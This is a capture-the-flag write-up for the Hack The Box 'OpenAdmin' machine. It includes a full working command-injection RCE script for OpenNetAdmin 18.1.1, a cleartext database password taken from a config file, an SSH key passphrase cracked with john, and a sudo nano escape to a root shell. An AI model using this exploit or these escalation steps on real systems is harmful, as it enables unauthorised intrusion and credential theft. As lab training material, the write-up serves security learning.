Enumeration and Initial Foothold

We begin our enumeration by running a port scan with Nmap, checking for open ports and default scripts.

m1m3@kali:~$ nmap -sC -sV -oA nmap/openAdmin 10.10.10.171

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 22:38 IST
Nmap scan report for 10.10.10.171
Host is up (0.33s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp   open  http       Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
4444/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.29 seconds

We see a webserver running on port 80 showing the default apache page.

Next, we will be running a gobuster scan searching for the directories.

We can see a directory name ona which shows is running OpenNetAdmin Version 18.1.1

On looking on searchsploit, we see a vulnerable version which gives us remote command execution.

m1m3@kali:~$ searchsploit OpenNetAdmin
--------------------------------------- ---------------------------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ---------------------------------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution                 | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)  | exploits/php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution                   | exploits/php/webapps/47691.sh
--------------------------------------- ---------------------------------------------------------

For some reason, the exploit was not working for me, so instead I copied the exploit from the exploitdb. You can copy the following exploit and save it as exploit.sh

# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
 
# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
 
#!/bin/bash
 
URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

Give the file executable permissions and run the exploit.

m1m3@kali:~$ chmod +x exploit.sh 
m1m3@kali:~$ ./exploit.sh http://10.10.10.171/ona/
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)   

User Shell

We managed to get a low privileged shell! Let’s now go for the user. Currently we are in /opt/ona/www/

$ pwd                                   
/opt/ona/www
$ ls -lah
total 80K
drwxrwxr-x 10 www-data www-data 4.0K May  1 17:04 .
drwxr-x---  7 www-data www-data 4.0K Nov 21 18:23 ..
-rw-rw-r--  1 www-data www-data 2.0K Jan  3  2018 .htaccess.example
drwxrwxr-x  2 www-data www-data 4.0K Jan  3  2018 config
-rw-rw-r--  1 www-data www-data 2.0K Jan  3  2018 config_dnld.php
-rw-rw-r--  1 www-data www-data 4.1K Jan  3  2018 dcm.php
drwxrwxr-x  3 www-data www-data 4.0K Jan  3  2018 images
drwxrwxr-x  9 www-data www-data 4.0K Jan  3  2018 include
-rw-rw-r--  1 www-data www-data 2.0K Jan  3  2018 index.php
drwxrwxr-x  5 www-data www-data 4.0K Jan  3  2018 local
-rw-rw-r--  1 www-data www-data 4.5K Jan  3  2018 login.php
-rw-rw-r--  1 www-data www-data 1.1K Jan  3  2018 logout.php
drwxrwxr-x  3 www-data www-data 4.0K Jan  3  2018 modules
-rw-r--r--  1 www-data www-data 5.4K May  1 16:40 php-reverse-shell.php
drwxrwxr-x  3 www-data www-data 4.0K Jan  3  2018 plugins
drwxrwxr-x  2 www-data www-data 4.0K Jan  3  2018 winc
drwxrwxr-x  3 www-data www-data 4.0K Jan  3  2018 workspace_plugins

If we look into the contents of local/config/ we can see a config file, which gives us a password.

$ ls -lah local/config/
total 16K
drwxrwxr-x 2 www-data www-data 4.0K Nov 21 16:51 .
drwxrwxr-x 5 www-data www-data 4.0K Jan  3  2018 ..
-rw-r--r-- 1 www-data www-data  426 Nov 21 16:51 database_settings.inc.php
-rw-rw-r-- 1 www-data www-data 1.2K Jan  3  2018 motd.txt.example
-rw-r--r-- 1 www-data www-data    0 Nov 21 16:28 run_installer

$ cat local/config/database_settings.inc.php
<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

$ 

Also, If we look at the home directory, we have two users there jimmy and joanna.

$ ls /home/
jimmy
joanna

We can use the password we got to ssh into jimmy.

m1m3@kali:~$ ssh jimmy@10.10.10.171

jimmy@10.10.10.171's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri May  1 18:32:27 UTC 2020

  System load:  1.4               Processes:             190
  Usage of /:   50.3% of 7.81GB   Users logged in:       1
  Memory usage: 34%               IP address for ens160: 10.10.10.171
  Swap usage:   0%

  => There is 1 zombie process.


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri May  1 18:23:38 2020 from 10.10.14.71
jimmy@openadmin:~$ id
uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal)
jimmy@openadmin:~$ cd ../joanna/
-bash: cd: ../joanna/: Permission denied

We cannot cd into joanna’s home directory, so we need to find some other way in. After some enumeration, I found that we have a directory in /var/www/internal/ owned by user jimmy.

jimmy@openadmin:/var/www/internal$ ls -lah
total 20K
drwxrwx--- 2 jimmy internal 4.0K Nov 23 17:43 .
drwxr-xr-x 4 root  root     4.0K Nov 22 18:15 ..
-rwxrwxr-x 1 jimmy internal 3.2K Nov 22 23:24 index.php
-rwxrwxr-x 1 jimmy internal  185 Nov 23 16:37 logout.php
-rwxrwxr-x 1 jimmy internal  339 Nov 23 17:40 main.php

Looking into main.php, we can see that it prompts the id_rsa of user joanna.

jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$ 

Now we need to know which port this service is running on. For this we can use the netstat -tulpn command:

jimmy@openadmin:/var/www/internal$ netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:52846         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
jimmy@openadmin:/var/www/internal$ 

We can see a service running on port 52846. We can get the file using:

jimmy@openadmin:/var/www/internal$ curl 127.0.0.1:52846/main.php

Now we can decrypt the rsa using john and get the password bloodninjas

m1m3@kali:~$ python /usr/share/john/ssh2john.py joanna_rsa> joanna_rsa.hash
m1m3@kali:~$ john --wordlist=/usr/share/wordlists/rockyou.txt joanna_rsa.hash

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (joanna_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:07 DONE (2020-05-02 00:39) 0.1396g/s 2003Kp/s 2003Kc/s 2003KC/sa6_123..*7_Vamos!
Session completed

Now Let’s ssh into user joanna, but don’t forget to change permissions of the rsa key.

m1m3@kali:~$ chmod 700 joanna_rsa
m1m3@kali:~$ ssh -i joanna_rsa joanna@10.10.10.171

Enter passphrase for key 'joanna_rsa': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri May  1 19:13:01 UTC 2020

  System load:  0.15              Processes:             188
  Usage of /:   51.0% of 7.81GB   Users logged in:       1
  Memory usage: 35%               IP address for ens160: 10.10.10.171
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Jan  2 21:12:40 2020 from 10.10.14.3
joanna@openadmin:~$ id
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)
joanna@openadmin:~$ 

Now we can read the user.txt!

joanna@openadmin:~$ wc -c user.txt
33 user.txt
joanna@openadmin:~$ 

Root User

Gaining root is easy! sudo -l command shows that user Joanna can run /bin/nano /opt/priv as the root user without entering a password. When you see that users can run nano as a root user, this is the easiest way to use it.

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

Searching on GTFO Bins, I found that we can exploit this by open the file with nano using:

sudo nano /opt/priv

Then press Ctrl + R and then Ctrl + X. After that enter the following command:

reset; sh 1>&0 2>&0

That’s it! Thanks for reading! Make sure to stay tuned for more upcoming Hack The Box writeups!

NOTE: The awesome artwork used in this article was created by Marlon Urrutia.